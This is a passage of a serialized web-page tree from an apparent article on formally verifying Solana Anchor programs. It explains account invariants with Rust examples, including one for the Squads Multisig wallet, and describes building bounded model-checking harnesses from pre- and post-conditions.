00],{"type":30,"value":4054},{"type":24,"tag":301,"props":27402,"children":27403},{"style":359},[27404],{"type":30,"value":27379},{"type":24,"tag":301,"props":27406,"children":27407},{"class":303,"line":401},[27408,27412,27417,27421,27425,27429,27433,27437,27441,27445,27449,27453],{"type":24,"tag":301,"props":27409,"children":27410},{"style":348},[27411],{"type":30,"value":27037},{"type":24,"tag":301,"props":27413,"children":27414},{"style":314},[27415],{"type":30,"value":27416}," my_instruction",{"type":24,"tag":301,"props":27418,"children":27419},{"style":359},[27420],{"type":30,"value":362},{"type":24,"tag":301,"props":27422,"children":27423},{"style":369},[27424],{"type":30,"value":27051},{"type":24,"tag":301,"props":27426,"children":27427},{"style":385},[27428],{"type":30,"value":1679},{"type":24,"tag":301,"props":27430,"children":27431},{"style":10246},[27432],{"type":30,"value":27060},{"type":24,"tag":301,"props":27434,"children":27435},{"style":359},[27436],{"type":30,"value":1849},{"type":24,"tag":301,"props":27438,"children":27439},{"style":385},[27440],{"type":30,"value":4054},{"type":24,"tag":301,"props":27442,"children":27443},{"style":359},[27444],{"type":30,"value":27217},{"type":24,"tag":301,"props":27446,"children":27447},{"style":385},[27448],{"type":30,"value":882},{"type":24,"tag":301,"props":27450,"children":27451},{"style":10246},[27452],{"type":30,"value":20555},{"type":24,"tag":301,"props":27454,"children":27455},{"style":359},[27456],{"type":30,"value":27102},{"type":24,"tag":301,"props":27458,"children":27459},{"class":303,"line":415},[27460],{"type":24,"tag":301,"props":27461,"children":27462},{"style":385},[27463],{"type":30,"value":27110},{"type":24,"tag":301,"props":27465,"children":27466},{"class":303,"line":439},[27467],{"type":24,"tag":301,"props":27468,"children":27469},{"style":359},[27470],{"type":30,"value":698},{"type":24,"tag":32,"props":27472,"children":27473},{},[27474],{"type":30,"value":27475},"Note that in practice, it is usually not necessary (or useful) to find the exact condition; rather we can achieve the security properties we want purely by proving upper and lower bounds on instruction success.",{"type":24,"tag":270,"props":27477,"children":27479},{"id":27478},"account-invariants",[27480],{"type":30,"value":27481},"Account Invariants",{"type":24,"tag":32,"props":27483,"children":27484},{},[27485,27487,27492],{"type":30,"value":27486},"The other type of invariant is an ",{"type":24,"tag":60,"props":27488,"children":27489},{},[27490],{"type":30,"value":27491},"Account Invariant",{"type":30,"value":27493},". This invariant describes some property of an account that should always hold.",{"type":24,"tag":32,"props":27495,"children":27496},{},[27497,27499,27504,27505,27510],{"type":30,"value":27498},"In our tool, we verify that the account invariant holds after every instruction that could modify the account data (i.e. if the account is ",{"type":24,"tag":145,"props":27500,"children":27502},{"className":27501},[],[27503],{"type":30,"value":10550},{"type":30,"value":152},{"type":24,"tag":145,"props":27506,"children":27508},{"className":27507},[],[27509],{"type":30,"value":9033},{"type":30,"value":27511},").",{"type":24,"tag":32,"props":27513,"children":27514},{},[27515,27517,27523],{"type":30,"value":27516},"For example, given a mock ",{"type":24,"tag":145,"props":27518,"children":27520},{"className":27519},[],[27521],{"type":30,"value":27522},"UserStatement",{"type":30,"value":27524}," account that represents how much a user owns and owes, we could write an invariant that asserts that the net balance is positive:",{"type":24,"tag":291,"props":27526,"children":27528},{"code":27527,"language":9817,"meta":7,"className":9818,"style":7},"#[account]\n#[invariant(\n self.assets >= self.liabilities\n)]\nstruct UserStatement {\n pub owner: Pubkey,\n pub assets: u64,\n pub liabilities: u64,\n}\n",[27529],{"type":24,"tag":145,"props":27530,"children":27531},{"__ignoreMap":7},[27532,27540,27548,27582,27589,27605,27631,27655,27679],{"type":24,"tag":301,"props":27533,"children":27534},{"class":303,"line":304},[27535],{"type":24,"tag":301,"props":27536,"children":27537},{"style":359},[27538],{"type":30,"value":27539},"#[account]\n",{"type":24,"tag":301,"props":27541,"children":27542},{"class":303,"line":320},[27543],{"type":24,"tag":301,"props":27544,"children":27545},{"style":359},[27546],{"type":30,"value":27547},"#[invariant(\n",{"type":24,"tag":301,"props":27549,"children":27550},{"class":303,"line":335},[27551,27556,27560,27565,27569,27573,27577],{"type":24,"tag":301,"props":27552,"children":27553},{"style":359},[27554],{"type":30,"value":27555}," self",{"type":24,"tag":301,"props":27557,"children":27558},{"style":385},[27559],{"type":30,"value":206},{"type":24,"tag":301,"props":27561,"children":27562},{"style":359},[27563],{"type":30,"value":27564},"assets ",{"type":24,"tag":301,"props":27566,"children":27567},{"style":385},[27568],{"type":30,"value":16748},{"type":24,"tag":301,"props":27570,"children":27571},{"style":359},[27572],{"type":30,"value":20590},{"type":24,"tag":301,"props":27574,"children":27575},{"style":385},[27576],{"type":30,"value":206},{"type":24,"tag":301,"props":27578,"children":27579},{"style":359},[27580],{"type":30,"value":27581},"liabilities\n",{"type":24,"tag":301,"props":27583,"children":27584},{"class":303,"line":344},[27585],{"type":24,"tag":301,"props":27586,"children":27587},{"style":359},[27588],{"type":30,"value":27029},{"type":24,"tag":301,"props":27590,"children":27591},{"class":303,"line":401},[27592,27596,27601],{"type":24,"tag":301,"props":27593,"children":27594},{"style":348},[27595],{"type":30,"value":3010},{"type":24,"tag":301,"props":27597,"children":27598},{"style":10246},[27599],{"type":30,"value":27600}," UserStatement",{"type":24,"tag":301,"props":27602,"children":27603},{"style":359},[27604],{"type":30,"value":3035},{"type":24,"tag":301,"props":27606,"children":27607},{"class":303,"line":415},[27608,27613,27618,27622,27627],{"type":24,"tag":301,"props":27609,"children":27610},{"style":348},[27611],{"type":30,"value":27612}," pub",{"type":24,"tag":301,"props":27614,"children":27615},{"style":369},[27616],{"type":30,"value":27617}," owner",{"type":24,"tag":301,"props":27619,"children":27620},{"style":385},[27621],{"type":30,"value":1679},{"type":24,"tag":301,"props":27623,"children":27624},{"style":10246},[27625],{"type":30,"value":27626}," Pubkey",{"type":24,"tag":301,"props":27628,"children":27629},{"style":359},[27630],{"type":30,"value":1729},{"type":24,"tag":301,"props":27632,"children":27633},{"class":303,"line":439},[27634,27638,27643,27647,27651],{"type":24,"tag":301,"props":27635,"children":27636},{"style":348},[27637],{"type":30,"value":27612},{"type":24,"tag":301,"props":27639,"children":27640},{"style":369},[27641],{"type":30,"value":27642}," assets",{"type":24,"tag":301,"props":27644,"children":27645},{"style":385},[27646],{"type":30,"value":1679},{"type":24,"tag":301,"props":27648,"children":27649},{"style":10246},[27650],{"type":30,"value":12680},{"type":24,"tag":301,"props":27652,"children":27653},{"style":359},[27654],{"type":30,"value":1729},{"type":24,"tag":301,"props":27656,"children":27657},{"class":303,"line":447},[27658,27662,27667,27671,27675],{"type":24,"tag":301,"props":27659,"children":27660},{"style":348},[27661],{"type":30,"value":27612},{"type":24,"tag":301,"props":27663,"children":27664},{"style":369},[27665],{"type":30,"value":27666}," liabilities",{"type":24,"tag":301,"props":27668,"children":27669},{"style":385},[27670],{"type":30,"value":1679},{"type":24,"tag":301,"props":27672,"children":27673},{"style":10246},[27674],{"type":30,"value":12680},{"type":24,"tag":301,"props":27676,"children":27677},{"style":359},[27678],{"type":30,"value":1729},{"type":24,"tag":301,"props":27680,"children":27681},{"class":303,"line":476},[27682],{"type":24,"tag":301,"props":27683,"children":27684},{"style":359},[27685],{"type":30,"value":698},{"type":24,"tag":32,"props":27687,"children":27688},{},[27689,27691,27696],{"type":30,"value":27690},"Our tool automatically generates the relevant harnesses to ensure that this property holds every time an account of type ",{"type":24,"tag":145,"props":27692,"children":27694},{"className":27693},[],[27695],{"type":30,"value":27522},{"type":30,"value":27697}," is created or modified.",{"type":24,"tag":32,"props":27699,"children":27700},{},[27701,27703,27709],{"type":30,"value":27702},"In another example, we developed the following invariant for the ",{"type":24,"tag":188,"props":27704,"children":27706},{"href":25601,"rel":27705},[192],[27707],{"type":30,"value":27708},"Squads Multisig",{"type":30,"value":27710}," wallet account:",{"type":24,"tag":291,"props":27712,"children":27714},{"code":27713,"language":9817,"meta":7,"className":9818,"style":7},"#[account]\n#[invariant(\n !self.keys.is_empty()\n && (self.keys.len() \u003C= u16::MAX as usize)\n && (self.threshold >= 1)\n && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms {\n pub threshold: u16, // threshold for signatures\n pub authority_index: u16, // index to seed other authorities under this multisig\n pub transaction_index: u32, // look up and seed reference for transactions\n pub ms_change_index: u32, // the last executed/closed transaction\n pub bump: u8, // bump for the multisig seed\n pub create_key: Pubkey, // random key(or not) used to seed the multisig pda\n pub allow_external_execute: bool, // allow non-member keys to execute txs\n pub keys: Vec\u003CPubkey>, // keys of the members\n}\n",[27715],{"type":24,"tag":145,"props":27716,"children":27717},{"__ignoreMap":7},[27718,27725,27732,27762,27821,27850,27902,27909,27930,27960,27990,28020,28049,28079,28109,28138,28178],{"type":24,"tag":301,"props":27719,"children":27720},{"class":303,"line":304},[27721],{"type":24,"tag":301,"props":27722,"children":27723},{"style":359},[27724],{"type":30,"value":27539},{"type":24,"tag":301,"props":27726,"children":27727},{"class":303,"line":320},[27728],{"type":24,"tag":301,"props":27729,"children":27730},{"style":359},[27731],{"type":30,"value":27547},{"type":24,"tag":301,"props":27733,"children":27734},{"class":303,"line":335},[27735,27740,27744,27748,27753,27757],{"type":24,"tag":301,"props":27736,"children":27737},{"style":385},[27738],{"type":30,"value":27739}," !",{"type":24,"tag":301,"props":27741,"children":27742},{"style":359},[27743],{"type":30,"value":20507},{"type":24,"tag":301,"props":27745,"children":27746},{"style":385},[27747],{"type":30,"value":206},{"type":24,"tag":301,"props":27749,"children":27750},{"style":359},[27751],{"type":30,"value":27752},"keys",{"type":24,"tag":301,"props":27754,"children":27755},{"style":385},[27756],{"type":30,"value":206},{"type":24,"tag":301,"props":27758,"children":27759},{"style":359},[27760],{"type":30,"value":27761},"is_empty()\n",{"type":24,"tag":301,"props":27763,"children":27764},{"class":303,"line":344},[27765,27769,27774,27778,27782,27786,27791,27795,27800,27804,27809,27813,27817],{"type":24,"tag":301,"props":27766,"children":27767},{"style":385},[27768],{"type":30,"value":22410},{"type":24,"tag":301,"props":27770,"children":27771},{"style":359},[27772],{"type":30,"value":27773}," (self",{"type":24,"tag":301,"props":27775,"children":27776},{"style":385},[27777],{"type":30,"value":206},{"type":24,"tag":301,"props":27779,"children":27780},{"style":359},[27781],{"type":30,"value":27752},{"type":24,"tag":301,"props":27783,"children":27784},{"style":385},[27785],{"type":30,"value":206},{"type":24,"tag":301,"props":27787,"children":27788},{"style":359},[27789],{"type":30,"value":27790},"len() ",{"type":24,"tag":301,"props":27792,"children":27793},{"style":385},[27794],{"type":30,"value":26188},{"type":24,"tag":301,"props":27796,"children":27797},{"style":10246},[27798],{"type":30,"value":27799}," u16",{"type":24,"tag":301,"props":27801,"children":27802},{"style":385},[27803],{"type":30,"value":10308},{"type":24,"tag":301,"props":27805,"children":27806},{"style":10246},[27807],{"type":30,"value":27808},"MAX",{"type":24,"tag":301,"props":27810,"children":27811},{"style":348},[27812],{"type":30,"value":15640},{"type":24,"tag":301,"props":27814,"children":27815},{"style":10246},[27816],{"type":30,"value":20525},{"type":24,"tag":301,"props":27818,"children":27819},{"style":359},[27820],{"type":30,"value":791},{"type":24,"tag":301,"props":27822,"children":27823},{"class":303,"line":401},[27824,27828,27832,27836,27841,27845],{"type":24,"tag":301,"props":27825,"children":27826},{"style":385},[27827],{"type":30,"value":22410},{"type":24,"tag":301,"props":27829,"children":27830},{"style":359},[27831],{"type":30,"value":27773},{"type":24,"tag":301,"props":27833,"children":27834},{"style":385},[27835],{"type":30,"value":206},{"type":24,"tag":301,"props":27837,"children":27838},{"style":359},[27839],{"type":30,"value":27840},"threshold ",{"type":24,"tag":301,"props":27842,"children":27843},{"style":385},[27844],{"type":30,"value":16748},{"type":24,"tag":301,"props":27846,"children":27847},{"style":359},[27848],{"type":30,"value":27849}," 1)\n",{"type":24,"tag":301,"props":27851,"children":27852},{"class":303,"line":415},[27853,27857,27861,27865,27869,27873,27877,27881,27885,27889,27893,27897],{"type":24,"tag":301,"props":27854,"children":27855},{"style":385},[27856],{"type":30,"value":22410},{"type":24,"tag":301,"props":27858,"children":27859},{"style":359},[27860],{"type":30,"value":27773},{"type":24,"tag":301,"props":27862,"children":27863},{"style":385},[27864],{"type":30,"value":206},{"type":24,"tag":301,"props":27866,"children":27867},{"style":359},[27868],{"type":30,"value":27840},{"type":24,"tag":301,"props":27870,"children":27871},{"style":348},[27872],{"type":30,"value":15654},{"type":24,"tag":301,"props":27874,"children":27875},{"style":10246},[27876],{"type":30,"value":20525},{"type":24,"tag":301,"props":27878,"children":27879},{"style":385},[27880],{"type":30,"value":15012},{"type":24,"tag":301,"props":27882,"children":27883},{"style":359},[27884],{"type":30,"value":20590},{"type":24,"tag":301,"props":27886,"children":27887},{"style":385},[27888],{"type":30,"value":206},{"type":24,"tag":301,"props":27890,"children":27891},{"style":359},[27892],{"type":30,"value":27752},{"type":24,"tag":301,"props":27894,"children":27895},{"style":385},[27896],{"type":30,"value":206},{"type":24,"tag":301,"props":27898,"children":27899},{"style":359},[27900],{"type":30,"value":27901},"len())\n",{"type":24,"tag":301,"props":27903,"children":27904},{"class":303,"line":439},[27905],{"type":24,"tag":301,"props":27906,"children":27907},{"style":359},[27908],{"type":30,"value":27029},{"type":24,"tag":301,"props":27910,"children":27911},{"class":303,"line":447},[27912,27916,27921,27926],{"type":24,"tag":301,"props":27913,"children":27914},{"style":348},[27915],{"type":30,"value":20484},{"type":24,"tag":301,"props":27917,"children":27918},{"style":348},[27919],{"type":30,"value":27920}," struct",{"type":24,"tag":301,"props":27922,"children":27923},{"style":10246},[27924],{"type":30,"value":27925}," Ms",{"type":24,"tag":301,"props":27927,"children":27928},{"style":359},[27929],{"type":30,"value":3035},{"type":24,"tag":301,"props":27931,"children":27932},{"class":303,"line":476},[27933,27937,27942,27946,27950,27955],{"type":24,"tag":301,"props":27934,"children":27935},{"style":348},[27936],{"type":30,"value":27612},{"type":24,"tag":301,"props":27938,"children":27939},{"style":369},[27940],{"type":30,"value":27941}," threshold",{"type":24,"tag":301,"props":27943,"children":27944},{"style":385},[27945],{"type":30,"value":1679},{"type":24,"tag":301,"props":27947,"children":27948},{"style":10246},[27949],{"type":30,"value":27799},{"type":24,"tag":301,"props":27951,"children":27952},{"style":359},[27953],{"type":30,"value":27954},", ",{"type":24,"tag":301,"props":27956,"children":27957},{"style":1062},[27958],{"type":30,"value":27959},"// threshold for signatures\n",{"type":24,"tag":301,"props":27961,"children":27962},{"class":303,"line":495},[27963,27967,27972,27976,27980,27985],{"type":24,"tag":301,"props":27964,"children":27965},{"style":348},[27966],{"type":30,"value":27612},{"type":24,"tag":301,"props":27968,"children":27969},{"style":369},[27970],{"type":30,"value":27971}," authority_index",{"type":24,"tag":301,"props":27973,"children":27974},{"style":385},[27975],{"type":30,"value":1679},{"type":24,"tag":301,"props":27977,"children":27978},{"style":10246},[27979],{"type":30,"value":27799},{"type":24,"tag":301,"props":27981,"children":27982},{"style":359},[27983],{"type":30,"value":27984},", ",{"type":24,"tag":301,"props":27986,"children":27987},{"style":1062},[27988],{"type":30,"value":27989},"// index to seed other authorities under this multisig\n",{"type":24,"tag":301,"props":27991,"children":27992},{"class":303,"line":504},[27993,27997,28002,28006,28010,28015],{"type":24,"tag":301,"props":27994,"children":27995},{"style":348},[27996],{"type":30,"value":27612},{"type":24,"tag":301,"props":27998,"children":27999},{"style":369},[28000],{"type":30,"value":28001}," transaction_index",{"type":24,"tag":301,"props":28003,"children":28004},{"style":385},[28005],{"type":30,"value":1679},{"type":24,"tag":301,"props":28007,"children":28008},{"style":10246},[28009],{"type":30,"value":24327},{"type":24,"tag":301,"props":28011,"children":28012},{"style":359},[28013],{"type":30,"value":28014},", ",{"type":24,"tag":301,"props":28016,"children":28017},{"style":1062},[28018],{"type":30,"value":28019},"// look up and seed reference for transactions\n",{"type":24,"tag":301,"props":28021,"children":28022},{"class":303,"line":512},[28023,28027,28032,28036,28040,28044],{"type":24,"tag":301,"props":28024,"children":28025},{"style":348},[28026],{"type":30,"value":27612},{"type":24,"tag":301,"props":28028,"children":28029},{"style":369},[28030],{"type":30,"value":28031}," ms_change_index",{"type":24,"tag":301,"props":28033,"children":28034},{"style":385},[28035],{"type":30,"value":1679},{"type":24,"tag":301,"props":28037,"children":28038},{"style":10246},[28039],{"type":30,"value":24327},{"type":24,"tag":301,"props":28041,"children":28042},{"style":359},[28043],{"type":30,"value":27984},{"type":24,"tag":301,"props":28045,"children":28046},{"style":1062},[28047],{"type":30,"value":28048},"// the last executed/closed transaction\n",{"type":24,"tag":301,"props":28050,"children":28051},{"class":303,"line":592},[28052,28056,28061,28065,28069,28074],{"type":24,"tag":301,"props":28053,"children":28054},{"style":348},[28055],{"type":30,"value":27612},{"type":24,"tag":301,"props":28057,"children":28058},{"style":369},[28059],{"type":30,"value":28060}," bump",{"type":24,"tag":301,"props":28062,"children":28063},{"style":385},[28064],{"type":30,"value":1679},{"type":24,"tag":301,"props":28066,"children":28067},{"style":10246},[28068],{"type":30,"value":21426},{"type":24,"tag":301,"props":28070,"children":28071},{"style":359},[28072],{"type":30,"value":28073},", ",{"type":24,"tag":301,"props":28075,"children":28076},{"style":1062},[28077],{"type":30,"value":28078},"// bump for the multisig seed\n",{"type":24,"tag":301,"props":28080,"children":28081},{"class":303,"line":619},[28082,28086,28091,28095,28099,28104],{"type":24,"tag":301,"props":28083,"children":28084},{"style":348},[28085],{"type":30,"value":27612},{"type":24,"tag":301,"props":28087,"children":28088},{"style":369},[28089],{"type":30,"value":28090}," create_key",{"type":24,"tag":301,"props":28092,"children":28093},{"style":385},[28094],{"type":30,"value":1679},{"type":24,"tag":301,"props":28096,"children":28097},{"style":10246},[28098],{"type":30,"value":27626},{"type":24,"tag":301,"props":28100,"children":28101},{"style":359},[28102],{"type":30,"value":28103},", ",{"type":24,"tag":301,"props":28105,"children":28106},{"style":1062},[28107],{"type":30,"value":28108},"// random key(or not) used to seed the multisig pda\n",{"type":24,"tag":301,"props":28110,"children":28111},{"class":303,"line":635},[28112,28116,28121,28125,28129,28133],{"type":24,"tag":301,"props":28113,"children":28114},{"style":348},[28115],{"type":30,"value":27612},{"type":24,"tag":301,"props":28117,"children":28118},{"style":369},[28119],{"type":30,"value":28120}," allow_external_execute",{"type":24,"tag":301,"props":28122,"children":28123},{"style":385},[28124],{"type":30,"value":1679},{"type":24,"tag":301,"props":28126,"children":28127},{"style":10246},[28128],{"type":30,"value":18848},{"type":24,"tag":301,"props":28130,"children":28131},{"style":359},[28132],{"type":30,"value":377},{"type":24,"tag":301,"props":28134,"children":28135},{"style":1062},[28136],{"type":30,"value":28137},"// allow non-member keys to execute txs\n",{"type":24,"tag":301,"props":28139,"children":28140},{"class":303,"line":643},[28141,28145,28150,28154,28159,28163,28168,28173],{"type":24,"tag":301,"props":28142,"children":28143},{"style":348},[28144],{"type":30,"value":27612},{"type":24,"tag":301,"props":28146,"children":28147},{"style":369},[28148],{"type":30,"value":28149}," keys",{"type":24,"tag":301,"props":28151,"children":28152},{"style":385},[28153],{"type":30,"value":1679},{"type":24,"tag":301,"props":28155,"children":28156},{"style":10246},[28157],{"type":30,"value":28158}," Vec",{"type":24,"tag":301,"props":28160,"children":28161},{"style":359},[28162],{"type":30,"value":1849},{"type":24,"tag":301,"props":28164,"children":28165},{"style":10246},[28166],{"type":30,"value":28167},"Pubkey",{"type":24,"tag":301,"props":28169,"children":28170},{"style":359},[28171],{"type":30,"value":28172},">, ",{"type":24,"tag":301,"props":28174,"children":28175},{"style":1062},[28176],{"type":30,"value":28177},"// keys of the members\n",{"type":24,"tag":301,"props":28179,"children":28180},{"class":303,"line":652},[28181],{"type":24,"tag":301,"props":28182,"children":28183},{"style":359},[28184],{"type":30,"value":698},{"type":24,"tag":32,"props":28186,"children":28187},{},[28188],{"type":30,"value":28189},"Here we are verifying multiple things at once:",{"type":24,"tag":2655,"props":28191,"children":28192},{},[28193,28204,28215,28226],{"type":24,"tag":2659,"props":28194,"children":28195},{},[28196,28202],{"type":24,"tag":145,"props":28197,"children":28199},{"className":28198},[],[28200],{"type":30,"value":28201},"!self.keys.is_empty()",{"type":30,"value":28203}," : ensure there is at least one member",{"type":24,"tag":2659,"props":28205,"children":28206},{},[28207,28213],{"type":24,"tag":145,"props":28208,"children":28210},{"className":28209},[],[28211],{"type":30,"value":28212},"self.keys.len() \u003C= u16::MAX as usize",{"type":30,"value":28214}," : set an upper limit of 65535 members",{"type":24,"tag":2659,"props":28216,"children":28217},{},[28218,28224],{"type":24,"tag":145,"props":28219,"children":28221},{"className":28220},[],[28222],{"type":30,"value":28223},"self.threshold >= 1",{"type":30,"value":28225}," : ensure we always need at least one member to sign (threshold of zero would require no signers!)",{"type":24,"tag":2659,"props":28227,"children":28228},{},[28229,28235],{"type":24,"tag":145,"props":28230,"children":28232},{"className":28231},[],[28233],{"type":30,"value":28234},"self.threshold as usize \u003C= self.keys.len()",{"type":30,"value":28236}," : ensure we always have enough potential members to sign; if threshold was greater than the number of keys, no one could sign",{"type":24,"tag":43,"props":28238,"children":28240},{"id":28239},"verification-how-do-we-check-that-our-model-is-correct",[28241],{"type":30,"value":28242},"Verification: How do we check that our model is correct?",{"type":24,"tag":32,"props":28244,"children":28245},{},[28246,28248,28252,28254,28259],{"type":30,"value":28247},"Now that we have defined the specific instruction and account invariants, we need to generate ",{"type":24,"tag":5422,"props":28249,"children":28250},{},[28251],{"type":30,"value":26740},{"type":30,"value":28253}," on which we can run bounded model checking. Our tool does this ",{"type":24,"tag":5422,"props":28255,"children":28256},{},[28257],{"type":30,"value":28258},"automagically",{"type":30,"value":28260}," for anchor-lang programs.",{"type":24,"tag":32,"props":28262,"children":28263},{},[28264,28266,28272,28274,28279,28281,28286,28287,28292,28294,28299,28301,28306,28307,28313,28315,28321,28322,28328],{"type":30,"value":28265},"Specifically, for a given ",{"type":24,"tag":145,"props":28267,"children":28269},{"className":28268},[],[28270],{"type":30,"value":28271},"Context\u003CT>",{"type":30,"value":28273}," with ",{"type":24,"tag":5422,"props":28275,"children":28276},{},[28277],{"type":30,"value":28278},"incoming",{"type":30,"value":28280}," accounts of types (",{"type":24,"tag":145,"props":28282,"children":28284},{"className":28283},[],[28285],{"type":30,"value":9033},{"type":30,"value":1036},{"type":24,"tag":145,"props":28288,"children":28290},{"className":28289},[],[28291],{"type":30,"value":10550},{"type":30,"value":28293},") and ",{"type":24,"tag":5422,"props":28295,"children":28296},{},[28297],{"type":30,"value":28298},"outgoing",{"type":30,"value":28300}," accounts of type (",{"type":24,"tag":145,"props":28302,"children":28304},{"className":28303},[],[28305],{"type":30,"value":10550},{"type":30,"value":1036},{"type":24,"tag":145,"props":28308,"children":28310},{"className":28309},[],[28311],{"type":30,"value":28312},"close",{"type":30,"value":28314},") we define a ",{"type":24,"tag":145,"props":28316,"children":28318},{"className":28317},[],[28319],{"type":30,"value":28320},"pre_condition",{"type":30,"value":2378},{"type":24,"tag":145,"props":28323,"children":28325},{"className":28324},[],[28326],{"type":30,"value":28327},"post_condition",{"type":30,"value":28329}," expression that is a conjunction of all of the incoming and outcoming account invariants:",{"type":24,"tag":32,"props":28331,"children":28332},{},[28333],{"type":24,"tag":145,"props":28334,"children":28336},{"className":28335},[10807,10808],[28337],{"type":24,"tag":301,"props":28338,"children":28340},{"className":28339},[10813],[28341],{"type":24,"tag":301,"props":28342,"children":28344},{"className":28343,"ariaHidden":10819},[10818],[28345,28381],{"type":24,"tag":301,"props":28346,"children":28348},{"className":28347},[10824],[28349,28354,28362,28367,28371,28377],{"type":24,"tag":301,"props":28350,"children":28353},{"className":28351,"style":28352},[10829],"height:0.6833em;",[],{"type":24,"tag":301,"props":28355,"children":28359},{"className":28356,"style":28358},[10835,28357],"mathnormal","margin-right:0.13889em;",[28360],{"type":30,"value":28361},"P",{"type":24,"tag":301,"props":28363,"children":28365},{"className":28364},[10835],[28366],{"type":30,"value":584},{"type":24,"tag":301,"props":28368,"children":28370},{"className":28369,"style":11012},[10914],[],{"type":24,"tag":301,"props":28372,"children":28374},{"className":28373},[11017],[28375],{"type":30,"value":28376},":=",{"type":24,"tag":301,"props":28378,"children":28380},{"className":28379,"style":11012},[10914],[],{"type":24,"tag":301,"props":28382,"children":28384},{"className":28383},[10824],[28385,28390,28530,28534],{"type":24,"tag":301,"props":28386,"children":28389},{"className":28387,"style":28388},[10829],"height:1.2247em;vertical-align:-0.4747em;",[],{"type":24,"tag":301,"props":28391,"children":28394},{"className":28392},[28393],"mop",[28395,28404],{"type":24,"tag":301,"props":28396,"children":28401},{"className":28397,"style":28400},[28393,28398,28399],"op-symbol","small-op","position:relative;top:0em;",[28402],{"type":30,"value":28403},"⋀",{"type":24,"tag":301,"props":28405,"children":28407},{"className":28406},[10850],[28408],{"type":24,"tag":301,"props":28409,"children":28412},{"className":28410},[10855,28411],"vlist-t2",[28413,28518],{"type":24,"tag":301,"props":28414,"children":28416},{"className":28415},[10860],[28417,28511],{"type":24,"tag":301,"props":28418,"children":28421},{"className":28419,"style":28420},[10865],"height:0.2253em;",[28422],{"type":24,"tag":301,"props":28423,"children":28425},{"style":28424},"top:-2.4003em;margin-left:0em;margin-right:0.05em;",[28426,28430],{"type":24,"tag":301,"props":28427,"children":28429},{"className":28428,"style":10875},[10874],[],{"type":24,"tag":301,"props":28431,"children":28433},{"className":28432},[10880,10881,10882,10883],[28434],{"type":24,"tag":301,"props":28435,"children":28437},{"className":28436},[10835,10883],[28438,28443,28449,28459,28465,28474,28483,28489,28494,28500,28505],{"type":24,"tag":301,"props":28439,"children":28441},{"className":28440},[10835,28357,10883],[28442],{"type":30,"value":188},{"type":24,"tag":301,"props":28444,"children":28446},{"className":28445},[10835,28357,10883],[28447],{"type":30,"value":28448},"cc",{"type":24,"tag":301,"props":28450,"children":28452},{"className":28451},[10914,10883],[28453],{"type":24,"tag":301,"props":28454,"children":28456},{"className":28455},[10883],[28457],{"type":30,"value":28458}," ",{"type":24,"tag":301,"props":28460,"children":28462},{"className":28461},[11017,10883],[28463],{"type":30,"value":28464},"∈",{"type":24,"tag":301,"props":28466,"children":28468},{"className":28467},[10914,10883],[28469],{"type":24,"tag":301,"props":28470,"children":28472},{"className":28471},[10883],[28473],{"type":30,"value":28458},{"type":24,"tag":301,"props":28475,"children":28477},{"className":28476},[10835,30,10883],[28478],{"type":24,"tag":301,"props":28479,"children":28481},{"className":28480},[10835,10883],[28482],{"type":30,"value":28278},{"type":24,"tag":301,"props":28484,"children":28487},{"className":28485},[28486,10883],"mopen",[28488],{"type":30,"value":362},{"type":24,"tag":301,"props":28490,"children":28492},{"className":28491},[10835,28357,10883],[28493],{"type":30,"value":294},{"type":24,"tag":301,"props":28495,"children":28497},{"className":28496},[10835,28357,10883],[28498],{"type":30,"value":28499},"t",{"type":24,"tag":301,"props":28501,"children":28503},{"className":28502},[10835,28357,10883],[28504],{"type":30,"value":26050},{"type":24,"tag":301,"props":28506,"children":28509},{"className":28507},[28508,10883],"mclose",[28510],{"type":30,"value":9961},{"type":24,"tag":301,"props":28512,"children":28515},{"className":28513},[28514],"vlist-s",[28516],{"type":30,"value":28517},"​",{"type":24,"tag":301,"props":28519,"children":28521},{"className":28520},[10860],[28522],{"type":24,"tag":301,"props":28523,"children":28526},{"className":28524,"style":28525},[10865],"height:0.4747em;",[28527],{"type":24,"tag":301,"props":28528,"children":28529},{},[],{"type":24,"tag":301,"props":28531,"children":28533},{"className":28532,"style":10953},[10914],[],{"type":24,"tag":301,"props":28535,"children":28537},{"className":28536},[10835],[28538,28548,28553,28558,28563],{"type":24,"tag":301,"props":28539,"children":28541},{"className":28540},[10835,30],[28542],{"type":24,"tag":301,"props":28543,"children":28545},{"className":28544},[10835],[28546],{"type":30,"value":28547},"invariant",{"type":24,"tag":301,"props":28549,"children":28551},{"className":28550},[28486],[28552],{"type":30,"value":362},{"type":24,"tag":301,"props":28554,"children":28556},{"className":28555},[10835,28357],[28557],{"type":30,"value":188},{"type":24,"tag":301,"props":28559,"children":28561},{"className":28560},[10835,28357],[28562],{"type":30,"value":28448},{"type":24,"tag":301,"props":28564,"children":28566},{"className":28565},[28508],[28567],{"type":30,"value":9961},{"type":24,"tag":32,"props":28569,"children":28570},{},[28571],{"type":24,"tag":145,"props":28572,"children":28574},{"className":28573},[10807,10808],[28575],{"type":24,"tag":301,"props":28576,"children":28578},{"className":28577},[10813],[28579],{"type":24,"tag":301,"props":28580,"children":28582},{"className":28581,"ariaHidden":10819},[10818],[28583,28614],{"type":24,"tag":301,"props":28584,"children":28586},{"className":28585},[10824],[28587,28591,28596,28601,28605,28610],{"type":24,"tag":301,"props":28588,"children":28590},{"className":28589,"style":28352},[10829],[],{"type":24,"tag":301,"props":28592,"children":28594},{"className":28593,"style":28358},[10835,28357],[28595],{"type":30,"value":28361},{"type":24,"tag":301,"props":28597,"children":28599},{"className":28598},[10835],[28600],{"type":30,"value":546},{"type":24,"tag":301,"props":28602,"children":28604},{"className":28603,"style":11012},[10914],[],{"type":24,"tag":301,"props":28606,"children":28608},{"className":28607},[11017],[28609],{"type":30,"value":28376},{"type":24,"tag":301,"props":28611,"children":28613},{"className":28612,"style":11012},[10914],[],{"type":24,"tag":301,"props":28615,"children":28617},{"className":28616},[10824],[28618,28622,28745,28749],{"type":24,"tag":301,"props":28619,"children":28621},{"className":28620,"style":28388},[10829],[],{"type":24,"tag":301,"props":28623,"children":28625},{"className":28624},[28393],[28626,28631],{"type":24,"tag":301,"props":28627,"children":28629},{"className":28628,"style":28400},[28393,28398,28399],[28630],{"type":30,"value":28403},{"type":24,"tag":301,"props":28632,"children":28634},{"className":28633},[10850],[28635],{"type":24,"tag":301,"props":28636,"children":28638},{"className":28637},[10855,28411],[28639,28734],{"type":24,"tag":301,"props":28640,"children":28642},{"className":28641},[10860],[28643,28729],{"type":24,"tag":301,"props":28644,"children":28646},{"className":28645,"style":28420},[10865],[28647],{"type":24,"tag":301,"props":28648,"children"